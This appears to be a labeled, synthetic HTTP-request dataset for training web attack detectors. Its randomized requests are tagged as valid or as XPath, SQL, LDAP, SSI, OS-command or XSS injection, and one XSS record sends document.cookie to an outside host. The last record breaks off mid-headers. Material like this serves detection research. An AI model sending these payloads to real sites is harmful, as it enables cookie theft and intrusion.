Expires: Sun, 08 Feb 04 08:47:31 UTC
Last-Modified: Fri, 08 Jul 05 24:34:41 UTC
Host: 123.147.205.139:36609
Connection: 17iestod
Accept: audio/*, audio/basic;q=0.0
Accept-Charset: x-mac-hebrew, x-mac-ce
Accept-Encoding: *;q=0.8
Accept-Language: y8s3oi-6gaN, n9iuur-uAgahlua
Cache-Control: max-stale=5226
Client-ip: 182.144.239.94
Cookie: datergpde=afv7E
Cookie2: $Version="44"
Date: Tue, 11 Aug 09 23:25:28 CET
ETag: "dEUa-f.7nT1NUGyZ"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Sat, 13 Jan 07 08:41:52 UTC
If-Unmodified-Since: Fri, 01 Feb 08 21:30:25 CET
If-Match: *
If-None-Match: "Z7j@bMZ_A97XDV0"
If-Range: "gVayAy1G_nXhbFbolj"
Max-Forwards: 4
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="1sg3"
Authorization: NTLM Y2hiaFR3ZWt5dWh6YWUwY3B0aGRkN3V0cmVlZTUzSTRPbA==
Range: -35,310954-4,-65030
Referer: http://oeaf9Rrn.com/t5oremn/uuce3/ttanbmO/ouel1ob.dll
TE: deflate,trailers,chunked;q=0.5
Trailer: From
User-Agent: 6trrheno9tVdisoo
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 751x6296
Via: HTTP/9.1 212.73.118.26, 5.5 www.r3tis8r.jpg
Transfer-Encoding: saan; iTbu3ch=oo3Nri
Upgrade: eRoin/5.2, vsm/1.5, to6a/3.8, h0t/3.0
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

KZCCsNq=nu7lUsntlouwhs&pmPcFH=gCyRVMDPTmu&he=tmpn&mw=eXfo@ie uatfromc&4nP=07946&tnnlt=sxterm&ocw=do&LU8IYO-access_logGVd= e&cmsmEe=342

End - Id: 6936
Start - Id: 48970
class: XPathInjection
GET /edo/eKxGZWse/eqpotttSitdine5sn/Orsa7Dt/tZul65.html?7erhg=3065+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++++0344%3D&oni5es=iaadlsoczsE&OEtr3aEMos2ts=21694&G3y@xYxpsusx7=mufigee8&nTcu8ro1x=lh78eroaa&16=ierAUalesAmtweyr&mtafnhn=2&ewn6iflikeDQ=aamEcisdtR&PexecjV69hG7=l6TaCnOwaoHSa&jd7co=784 HTTP/1.1
Host: www.aJeyg.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, x-mac-chinesesimp, windows-1257, iso-10646-ucs-2, shift_jis;q=0.2
Accept-Encoding: 
Accept-Language: itt8rY-rk4srn, 7nM2r-aRm;q=0.3
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="23"
Date: Fri, 28 Oct 05 24:50:07 GMT
ETag: W/"jYHztclesekjaK2po0"
Expect: 100-continue
From: bthrh@77e4enih.uk
If-Modified-Since: Tue, 01 Jan 08 08:42:04 UTC
If-Unmodified-Since: Fri, 05 Nov 04 17:39:07 UTC
If-Match: "FbroY8fbk.4kZOkT"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /eneonm7s/wenro1T.jpg
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: fOB5GL http://www.esdIs.st
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 395x881
Via: 7.4 117.73.39.254
Transfer-Encoding: identity
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48970
Start - Id: 41880
class: SqlInjection
GET /pYiOwJ/hBEsMCe_l2/Knonucu/k41SNJAsWxe/opBKm.gif?U1=++%5Bt+leSae&ruioci=prmtab%3Dhs%2Bm&Mekmea=tbIZ&afulemonose9eg=25815&ia=select+bbvrDa+++++from+ALL_USERS&msknyAcEe2bw=rFH_7QWBI&26eyA=23520&hnH9uitgosc7=e0a%3Fri0 HTTP/1.1
Host: www.eap3irwiR.gov:66
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ft4a='owsPaS'
Client-ip: 203.18.145.66
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Mon, 09 Aug 04 01:27:20 CET
ETag: W/"yKcgygKPCwRoQ3lbkIJ"
Expect: irbS
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Fri, 23 Sep 05 05:05:41 UTC
If-Match: "RZeWUmEl@SmE-rH-sp"
If-None-Match: *
If-Range: *
Max-Forwards: 4366
MIME-Version: 0.4
Pragma: Ec1=n
Proxy-Authorization: NTLM aG91bjd0ZWhzYWRkcmh3ZW95YzA2YWNocnJldHFhbHNub3VhYXdlZGl0M2xyOTE=
Authorization: NTLM ZWlSZXR2b3Ric3BubmV0aW11ZWVuaDB0b3Nlc3V3YXBhYWJva25zb2VBaQ==
Range: 2764-93323,17883-91
Referer: http://A3zjveq.com/nizoh2n/Gtcol/leeort/5jieesze/utee.png
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/5.4 (Windows; U; Win98 9.7; 0M-oe; rv:4.6.0) Gecko/74851126
UA-CPU: StrongARM
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: 6.0 76.219.28.188, utq/8.6 www.ehjoke4.png:7375
Transfer-Encoding: 1Swwe; z3lr=ugbe
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41880
Start - Id: 44353
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: 199.145.231.195
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.9, x-mac-arabic;q=0.1, windows-1251;q=0.4, koi8-r;q=0.3, x-mac-icelandic;q=0.0
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.3
Cache-Control: max-stale=5
Client-ip: 206.144.99.228
Cookie: isvhnienixoN8to=eGJZ_Ghj;Tisnlm=012323
Cookie2: $Version="2"
Date: Fri, 02 Mar 07 08:05:30 UTC
ETag: "EeqXjCS5PORBp-bwP8v4"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Tue, 20 Oct 09 19:18:24 UTC
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: "GJMFDmKTB_d_BJ8FQB"
If-None-Match: "O7l7zN@Zf8o2aGrS"
If-Range: "Om_ZesJafUZ9OevCH"
Max-Forwards: 4684
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="f8b735a06dFFbEaA6Aeea2DfB9Fb33d2"
Range: -601,-24981
Referer: /inidp.exe
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 3.6; l0-li; rv:1.1.9) Gecko/26649343
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44353
Start - Id: 19917
class: Valid
GET /fh9onEXdKmsX/Rfv42g/openwhJO/klcgniletaostant/aTYtG0tkfog8CHDlV/d3el7xV02/myebrlcay6aca7td0s/g3eaect/tlTd4loesleo2pCtus1/itS.htm?fewcPm=nvsN&qife6pcEpateha7=+ie7te&kB-dkvBS19a=97668 HTTP/1.1
Host: www.rmsnaeUhLg.com
Connection: nsui
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: fbo2pr4-oqhar;q=0.0, iryA-cs
Cache-Control: m1yeo='jWgsero'
Client-ip: 133.54.82.143
Cookie: aaiqribu=feieh@Ptioejnm;U3Ymdis0esrse=lZ r;eOiserilnarT=mailh8l2ae0&hE
Cookie2: $Version="958"
Date: Thu, 08 Feb 07 09:40:53 GMT
ETag: W/"RCjO2WcwhLGdpA9"
Expect: 100-continue
From: hneNgnvt@ijh5.org
If-Modified-Since: Sat, 26 Jan 08 22:38:30 UTC
If-Unmodified-Since: Thu, 20 Oct 05 24:02:39 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Aug 09 12:16:08 UTC
Max-Forwards: 1
MIME-Version: 9.9
Pragma: 2irty='Etliy'
Proxy-Authorization: Basic UnNoZnU6YWVybG9jWW8=
Authorization: Digest cnonce="corhs"
Range: -8804
Referer: /ketpt/Iahtajad.jsp
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/8.9 (X11; U; SunOS sun4u 8.7; li-zy; rv:1.0.7) Gecko/10015208
UA-CPU: StrongARM
UA-Disp: 611,1277,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 205x6501
Via: Bthb/1.0 www.cen4.gif
Transfer-Encoding: gzip
Upgrade: nofnHJ/3.3, Eo0/1.9, eex/2.7, dloapf/3.8
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 43.150.154.249
X-Serial-Number: 52555
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19917
Start - Id: 30583
class: Valid
GET /bdaidLtr/tiMpb4oLWH5/Ma/Gdocument08/mEEUvcIqN/ttjg8Ygbs/o7mRw2HtelHTW.vYT/anor1ayaihlaDgivos/ih.asmx?niotrerrlst=occt&kssnnloca6u5lei=40232668&hiZH0mZ=2975&wecEPdizge=eNL%40BElxl HTTP/1.0
Host: 4.106.67.243:80
Connection: Otnc
Accept: text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 123.238.214.167
Cookie: Ferolwi=lnnJYeuJSWB;iMguSJcmdE_=tcF2enR5na8qnt1;4Ylib05hb=aFIlR@;elohe4nel=6494346
Cookie2: $Version="30"
Date: Wed, 15 Dec 04 07:16:09 UTC
ETag: "mR7n5iqgBAMBtL1K"
Expect: 100-continue
From: cehhmBuy@esgh9bl.de
If-Modified-Since: Mon, 18 Feb 08 18:23:35 CET
If-Unmodified-Since: Thu, 15 Jan 09 02:29:02 GMT
If-Match: "nFAEnXaVrmHYmsxCt"
If-None-Match: *
If-Range: "u@Wz_A_5CSwr0xB2twlz"
Max-Forwards: 827
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: Basic bnM2dTp3ZXRyZA==
Range: 69-311
Referer: /odItp1S.asmx
TE: trailers,gzip;q=0.3,chunked
Trailer: Warning
User-Agent: Mozilla/3.7 (compatible; MSIE 5.7; Solaris; rphsj7nm; mthT4l6a; eaa6a)
UA-CPU: 68000
UA-Disp: 8416,561,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: 2.5 www.dratmlr.gif, HTTP/7.8 78.73.55.15, mqe7/9.3 111.193.54.249
Transfer-Encoding: identity
Upgrade: l8ino/0.2, geoi1/3.9, w1yf/3.0, dNna/4.3
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 132.1.3.118
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30583
Start - Id: 34872
class: Valid
PUT /PumochaKOinsertm2LGAC/egNq/xrEnIofh8etni4ue/qGEnsSWWd4S@0/5Lwp-q@O4Sr.mspx? HTTP/1.1
Content-Length: 247
Content-Language: esEzinlr,1sbAt2i
Content-Encoding: compress
Content-Location: http://www.6stmS.ch/eqd0r3/8mrlhGZ.zip
Content-MD5: bm5zbm90WWdlNGVlOW41cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Jul 09 09:00:34 GMT
Last-Modified: Wed, 21 Sep 05 23:28:09 GMT
Host: 13.182.251.58
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: i-aTer
Cache-Control: no-store
Client-ip: 219.97.108.79
Cookie: ttdlhk8usepCho=91161832;opasswdcopyTMiX-= ti;t;lre9reuoerFr=6386
Cookie2: $Version="22"
Date: Sun, 03 Apr 05 10:53:46 UTC
ETag: W/"WaHcVBYC9.tRuNIQue"
Expect: 100-continue
From: gdoiesi5@hovn.gov
If-Modified-Since: Sun, 16 Nov 08 06:58:20 CET
If-Unmodified-Since: Thu, 30 Oct 08 04:49:11 GMT
If-Match: *
If-None-Match: "HoAGyuOF3xEqzXqW4C"
If-Range: Tue, 13 Mar 07 03:20:20 GMT
Max-Forwards: 8
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic Q3NsZWdlbzptaG9McGg=
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: /p6gectzh.js
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: 3kd9ancz (hO.ltlT; vB@zzF8K; ch-JtXB2P)
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 084x478
Via: FTP/4.3 235.77.19.174, FTP/8.9 167.164.33.50
Transfer-Encoding: identity
Upgrade: hamne/3.4, eeao/8.6, ewdlee/6.5, ubYty/3.3
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teNckwvoosIoes=IhtwRouetesabnnR&8hiee=yoXFeM@fH&eeAhadexhsd=tb34ro e&fnyifnmnesyps=henm&xr=vnrs&lf7tlalipcnc=3&8c=6&eme=Aphpuf&uns0ek=6&bGeAso1prBpJ=nl0hhk6dvetwd&oasipe=ohzlnhZpFHfii6e&scie=iNbdqmrcn3v&etah9ouo1n02aa=tpwhere/eub&olsriyedor=-e

End - Id: 34872
Start - Id: 36892
class: LdapInjection
GET /90al.AuRAidpYZ/sHhuUGbeB/osTue3hstslTht/mxot1acl/hIDb/atngedteW/d2ff/dDTaaOKB.msf?5L5ras-V3=mw0GGT&iL=9782847 HTTP/1.0
Host: 152.37.63.119
Connection: dkst
Accept: */*;q=0.3
Accept-Charset: shift_jis;q=0.2
Accept-Encoding: 
Accept-Language: b-mk;q=0.4, teUwho-heec7rT, oontwshn-vbcsioiu
Cache-Control: min-fresh=26
Cookie: rdalejrTenttaru=79;tbh6fttewa=bRuEn)( |  (5t=*);rTwzetUhsoAf=aoi$kygtxuniau
Cookie2: $Version="790"
Date: Wed, 21 Apr 10 21:11:00 CET
ETag: W/".Gn21yXW1FCQC087"
Expect: 100-continue
If-Modified-Since: Sat, 13 Aug 05 24:09:21 UTC
If-Unmodified-Since: Tue, 03 Feb 09 20:56:17 UTC
If-Match: *
If-None-Match: "qBJiuu3CaPD4oSkp"
If-Range: Wed, 09 Dec 09 19:28:58 GMT
Max-Forwards: 1690
MIME-Version: 4.3
Pragma: no-cache
Authorization: NTLM MGNyYVR0U2NvYmU4djdhdXV0aW1wbHI4Yzd4ZW1pZVR0ZHhzaXRzZWxoZW9u
Range: 2-,-1
Referer: /h8pw/tag0tre0/fit8om/eoit41/idh5jnpt.cfm
TE: gzip;q=0.5,gzip,chunked
Trailer: If-Match
User-Agent: Mozilla/9.0 (compatible; srtdoaeb; Linux i586; hapoeuloA; uthq1avh9; nwtjwahae)
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 8595x744
Via: HTTP/3.7 210.251.141.213:295, hht/3.5 www.O1Eou.css, 3nae/0.8 175.37.170.243
Transfer-Encoding: gzip
Warning: 741 www.mfst.htm "eeuaurentse2" "Wed, 25 Jul 07 20:34:34 GMT"
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36892
Start - Id: 31424
class: Valid
GET /kaytft3@BE/haj67/4cS/7q30Y0O0edocumentpG/xeyRHsG.php? HTTP/1.0
Host: www.eimvabs6e4.org:3155
Connection: close
Accept: text/html;q=0.9, image/jpeg;q=0.6, video/*
Accept-Charset: x-mac-chinesetrad, hz-gb-2312, utf-8
Accept-Encoding: compress;q=0.1
Accept-Language: oett-t7ejr, s-rec;q=0.8, kr-w, ioe-o
Cache-Control: max-stale
Client-ip: 193.41.20.91
Cookie: izeqrrI=8;NkVEC=3;loMoeg8=tqkD;vtszre=izzsu21ya
Cookie2: $Version="5"
Date: Wed, 17 Feb 10 01:44:45 UTC
ETag: W/"2Gi9f0nfFuxzGl2.OFj"
Expect: 100-continue
From: vconid@sswn.net
If-Modified-Since: Mon, 10 Nov 08 24:50:42 GMT
If-Unmodified-Since: Sun, 13 Jul 08 06:23:30 UTC
If-Match: "QC2PjsIid414X8o5ss"
If-None-Match: *
If-Range: ".5V88YcXOX5ndo4rlKf3"
Max-Forwards: 7
MIME-Version: 5.4
Pragma: rsa=r
Proxy-Authorization: NTLM dXV2bW9PMmVlZXM1ZWVvaHhocmhld0x0blRpbXZibGpjcnQ=
Authorization: NTLM bGlTY2V1c21hYWVuYmFocHRuaW11aW5yRDJsakRkenJ0Mw==
Range: -723,550-
Referer: /nt1AoilB/Efoaohfe/wnbjezoe.shtml
TE: trailers,gzip;q=0.4,gzip
Trailer: Via
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.9; Linux i586; nrnro; unhe; rsTu)
UA-CPU: PowerPC
UA-Disp: 887,1676,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4140x395
Via: aaaf/3.3 www.orntme.jpg
Transfer-Encoding: compress
Upgrade: wptde/7.7, 5sb/8.6
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31424
Start - Id: 49930
class: XPathInjection
GET /hvVGf/BpoI/sqIixz-AyxLUuwaBc2.jpeg?Das61=laeiavbscriptn&ny=oato%2Fcaee%2Fras%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D59%5D+++++or++++%27uw2nfoD%27+++%3D%27 HTTP/1.0
Host: www.ktheamoqvn.ch
Connection: 1v3r
Accept: text/*;q=0.4
Accept-Charset: x-mac-cyrillic;q=0.6, iso-8859-8-i;q=0.3
Accept-Encoding: *
Accept-Language: ri-Heie;q=0.7, eehm6-V0ou;q=0.6, sy-jmgB, 0tE-sfe;q=0.3
Cache-Control: max-stale
Client-ip: 69.149.110.120
Cookie: eb7ghetee7mio=3t
Cookie2: $Version="5"
Date: Mon, 01 May 06 18:22:47 CET
ETag: "mbvNrZbGQe@lb2Qziq"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Tue, 20 Jan 09 05:31:29 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:25:51 GMT
If-Match: *
If-None-Match: *
If-Range: "9NtuvThsKoOxD9B6dr9z"
Max-Forwards: 12
MIME-Version: 9.8
Pragma: aty=op
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: 53346-
Referer: http://www.rclQtl.it/l1az/d3ed/otaaaXn/hdaSees/bLrhq.mspx
TE: trailers,trailers
Trailer: User-Agent
User-Agent: labo90uteg/0.0.5.6.7
UA-CPU: x86
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: compress
Upgrade: ehlmn/3.5, olw/6.1, eTe/4.0, 703/0.0, leer/9.6
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49930
Start - Id: 47023
class: XSS
GET /sutEwiEue/tttSs55oetotg/rm_A.nRz6zub3uIbYl@/iaiolhe1e9te/GthgK0dtmpFbgsoundc7/CKUib2NQ4VH/atposo/oLIZ5N_1t-3pu7@3lY3t/qFbhuE4yePugx/2w8DsrBMP8TAXu.js?tUe0Amiees7dns=%3Ciframe+++++src+++%3D%22+++vbscript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.li.com%2Fcgi-bin%2Fisreeronse.cgi%27%2Bdocument.cookie%29%3B%5D+%22+%3E&nMee6a=leLp4mGDpwc HTTP/1.1
Host: 242.101.106.109
Connection: keep-alive
Accept: application/postscript, audio/x-wav;q=0.3
Accept-Charset: windows-1251;q=0.3, iso-8859-1;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: cnueSr='atte'
Client-ip: 133.1.185.73
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="206"
Date: Wed, 17 Aug 05 06:30:00 UTC
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: ntsa=smauIax;uoyhoS=rns3ee
From: Desiah@eghc.be
If-Modified-Since: Tue, 03 Feb 04 02:18:57 GMT
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: "ieVx5xDcPhI6G.O-4n"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "IkJ2g3GbLAe4x-e-S@"
Max-Forwards: 89
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: guaey ansi2ou=Anhkil5
Authorization: teopp nccti=dojweplt
Range: 72764-,7458-792763,4112-2767
Referer: /iS7elbo.php4
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 2.8; az-es; rv:0.3.5) Gecko/43974235
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.2 www.lcle.png
Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47023
Start - Id: 9398
class: Valid
GET /csd5tceetbuld/8sDlocationrTdocumentR/shqhlj/azOTeTvF.ymiR92/TlNdsrhnaaocfsRhytii.cfm? HTTP/1.0
Host: www.jmsneoe2.gov
Connection: close
Accept: audio/basic, application/x-tar, text/*;q=0.5
Accept-Charset: iso-8859-6;q=0.6, macintosh, macintosh, x-mac-chinesetrad, x-mac-arabic
Accept-Encoding: identity;q=0.8, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 92.24.119.207
Cookie: tss=8d1r;ar6sse5dir=773010;aajeteien=gtseaor9;w3amcihorrdbiae=0847;lNIga=ukytAZPyVY;efo=hosce&4
Cookie2: $Version="524"
Date: Sat, 08 Jan 05 13:13:48 GMT
ETag: "rL6DyzDqGZ.Tym0P"
Expect: BaEl
From: sspvni@sliueDto.cz
If-Modified-Since: Wed, 07 May 08 09:24:17 CET
If-Unmodified-Since: Mon, 06 Apr 09 22:42:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 20 May 04 17:48:33 UTC
Max-Forwards: 534
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic cmFIYXN5OmlndG01aWFy
Range: -33681
Referer: http://tipo.net/seseh.js
TE: deflate;q=0.4,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: mdtytnEqan (9Xr1Gf; eJqFc1; rKkO_QRPi)
UA-CPU: Sparc
UA-Disp: 849,768,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9764x9599
Via: FTP/2.7 53.154.9.229
Transfer-Encoding: compress
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 234 137.156.126.227 "edt3eLNsn" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 320269879204
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9398
Start - Id: 40432
class: SSI
PUT /sJfR/tEe1mv4lvrwali/ezV4jxhVvTJXR9sZ5.php3? HTTP/1.1
Content-Length: 189
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 11 Feb 07 04:00:48 GMT
Host: www.tnerehjece.gov
Connection: close
Accept: application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hgeaalMy-lEM4, hcg7tott-ch;q=0.4, arps-bano;q=0.0, c-2tlh5bhd
Cache-Control: ge=o3bukei
Cookie: 89%uEfS2Ikj=e%3Feahttpsn+%2Fhroupasswdo+sperls
Date: Sun, 06 May 07 24:04:32 GMT
If-Modified-Since: Wed, 05 Nov 08 19:23:11 CET
If-Unmodified-Since: Sat, 04 Feb 06 20:48:37 GMT
If-Match: *
If-None-Match: *
If-Range: "d3_-lFS6vOLvn5GB"
Max-Forwards: 138
Pragma: no-cache
Referer: http://ndnaple.de/rqnwn/daGO/rmAt.pdf
User-Agent: Mozilla/5.0 (Windows; U; Win98 0.4; qn-ou; rv:5.1.3) Gecko/91563294
Transfer-Encoding: compress

sge3pdn0hn=1896861627&1ESYU=<!--     #include     virtual="d:\windows\autoexec.bat"  -->&XTioKeval1Sllib=6)0ted=wp- Yarmde<t5i&DjiyhihieetbxH=8835&3thpaees=3855072

End - Id: 40432
Start - Id: 47334
class: XSS
GET /teaEerti/lDwCJ0J/orraAed6Clreee5aboC/oU1Z4Ob9W7A96Yl4aQ6c/hAqq6_0kAxMPM4/0x7b9qRfNhS/seon3p2dczz/e_Ro_dn/Lpassthrup/lijntqlLroa88eoemo7.png?pg1raz=aeayecoiee&nodo4nqiSocsa=tMk4u&nhk3dcq=%3Ca+++++href++++%3D++++%22++about%3A%3Cs%26%2399%3Bript++%3E%5Balert+%28%27jcnj4Cpl3t%27%29%3B%5D%3C%2Fscript++++%3E+++%22%3E&hiCyn0=9%5C30aan%3A&eaautnonhhjnRis=17&ey9nlmmin5no=43078002&dtinaKexean=+tphp%28N2lnldhttpsmijobjectmmto0&kNNMQrP8q03=O&2teSd=fnNtt%3D+eesechfhttp%24%25%3Ce HTTP/1.1
Host: www.oLrerel3c.ch:80
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: utf-7, utf-8;q=0.5, koi8, isiri-3342;q=0.7
Accept-Encoding: 
Accept-Language: t-wclr, eRdh7s-lshhrb;q=0.6, ettr-oa;q=0.9, ohI-4la, uaaavsi-sdht0;q=0.5
Cache-Control: max-stale
Client-ip: 88.199.53.236
Cookie: acia3rindho=6;aarurlba7huEahF=557755;wafIlfbddo=AhaioElt;Cqrg0Dk5=3969
Cookie2: $Version="498"
Date: Tue, 15 Nov 05 07:03:41 CET
ETag: W/"xUJkwqYmp@dQTg@fEDj-"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Wed, 15 Jul 09 16:39:32 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "4LjPEMD1PLRv7tVPonY"
If-None-Match: *
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 564
MIME-Version: 0.7
Pragma: hef='e'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: -827060,69-,229-399617
Referer: /Eq2iOgro.php3
TE: deflate;q=0.0,trailers
Trailer: If-Match
User-Agent: oustts (g@OIct0; uj9De9ELdM; cmFgTMd6V; imzWOYUB9.; rt3HMU9y)
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 575x5791
Via: 4.9 49.31.249.36, 1.9 www.rhnzyoQo.jpeg, 9.9 www.s1ap.jpeg
